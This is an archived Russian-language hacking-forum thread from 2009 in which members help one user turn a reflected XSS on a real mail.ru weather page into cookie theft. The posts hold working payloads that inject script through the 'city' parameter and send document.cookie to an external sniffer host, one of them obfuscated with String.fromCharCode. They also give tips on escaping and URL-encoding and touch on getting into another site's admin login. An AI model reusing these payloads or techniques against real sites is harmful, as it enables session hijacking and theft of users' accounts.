ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.09.2009, 17:56
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
IND1G0, этот твой фильтр все, кто знаком со скулями не первый день, обойдут. Методов вагон и маленькая тележка.
Да и к чему пустая трата времени при написании недо-фильтров, если есть нормальные методы: https://forum.antichat.ru/thread30641.html
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
12.09.2009, 18:45
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от Cehennem
Опять вопросик у меня.
Нашёл xss:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city=%22%3E%3Cscript%3Ea lert(%27xss%27)%3C/script%3E
Захожу на ссылку срабатывает alert и показывает рамку xss.
Пошёл на сниффер http://hacker-pro.net/sniffer/ и сделал редикет, но не сработало, даже взов не бросает снифферу, так-как лог пустой.
Ну решил поменять сниффер и пошёл на сниффер www.sniffer.xaknet.ru и сделал следующее:
вставил ссылку из сниффер вместо alert:
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1392.gif?"+document.cookie;</script>
и так испробовал несколько ссылок, но лог ПУСТОЙ! Что делать?
А можете сами быстринко поставить нужную ссылку и джать мне адрес сниффера, а потом я буду эксприментировать и найду разницу и свою ошибку.
Поможете?
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>eval(Stri ng.fromCharCode(105,109,103,32,61,32,110,101,119,3 2,73,109,97,103,101,40,41,59,32,105,109,103,46,115 ,114,99,32,61,32,34,104,116,116,112,58,47,47,115,1 10,105,102,102,101,114,46,120,97,107,110,101,116,4 6,114,117,47,115,109,105,108,101,115,47,105,109,10 3,95,95,49,51,57,50,46,103,105,102,63,34,43,100,11 1,99,117,109,101,110,116,46,99,111,111,107,105,101 ,59))</script><!--+
не забудь пробелы вырезать
|
|
|
|
13.09.2009, 00:00
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
BlackSun, и без чара обойтись можно  .
Cehennem, я тебе уже говорил, "+" воспринимается как пробел. Для XSS используй %2B.
|
|
|
|
13.09.2009, 07:27
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://haytour.am/login.asp
a 4to takoe tam Authorization key: 4to zdelat snim??
|
|
|
|
13.09.2009, 07:43
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от LokbatanLi
http://haytour.am/login.asp
a 4to takoe tam Authorization key: 4to zdelat snim??
Загружать с компа если у тебя его нет, значит ты не админ (но это совсем не говорит о том, что если он у тебя есть, то ты админ ), а если ты не админ, значит пи*дуешь дальше, так как ничего не светит (по крайней мере авторизоваться  )...
|
|
|
|
13.09.2009, 10:44
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Ну там же понятно что это админ панель
И для более безопасной работы сайта ввели "Authorization key", только проверенные люди админа могут это ввести  |
|
|
|
13.09.2009, 11:45
|
|
Banned
Регистрация: 03.06.2009
Сообщений: 28
Провел на форуме:
82669
Репутация:
-26
|
|
Сообщение от BlackSun
http://pogoda.mail.ru/favcity/citytune.html?action=tune&city="><script>eval(Stri ng.fromCharCode(105,109,103,32,61,32,110,101,119,3 2,73,109,97,103,101,40,41,59,32,105,109,103,46,115 ,114,99,32,61,32,34,104,116,116,112,58,47,47,115,1 10,105,102,102,101,114,46,120,97,107,110,101,116,4 6,114,117,47,115,109,105,108,101,115,47,105,109,10 3,95,95,49,51,57,50,46,103,105,102,63,34,43,100,11 1,99,117,109,101,110,116,46,99,111,111,107,105,101 ,59))</script><!--+
не забудь пробелы вырезать
А я чёта не понял, какой сниффер? Куда идут куки?
|
|
|
|
13.09.2009, 12:25
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544
Репутация:
412
|
|
img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1392.gif?"+document.cookie;
0o токо тсссссссссс.....
|
|
|
|
13.09.2009, 12:26
|
|
Banned
Регистрация: 03.06.2009
Сообщений: 28
Провел на форуме:
82669
Репутация:
-26
|
|
Сообщение от S00pY
img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1392.gif?"+document.cookie;
Я его вместо xss поставил но не сработало.
|
|
|
|
13.09.2009, 16:25
|
|
Новичок
Регистрация: 22.01.2009
Сообщений: 11
Провел на форуме:
114084
Репутация:
3
|
|
Cehennem
Кавычки слэшируются, из-за этого не пашет, надо закодировать ссылку.
Для кодирования используй, к примеру: http://ha.ckers.org/xss.html, а лучше http://kaimi.ru/2009/06/универсальный-конвертр-текста-1-0/. Там закодируй в String.fromCharCode. А BlackSun закодировал твою ссылку, куки идут к тебе на снифер.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1519509){kind=avatar}
Линейный вид
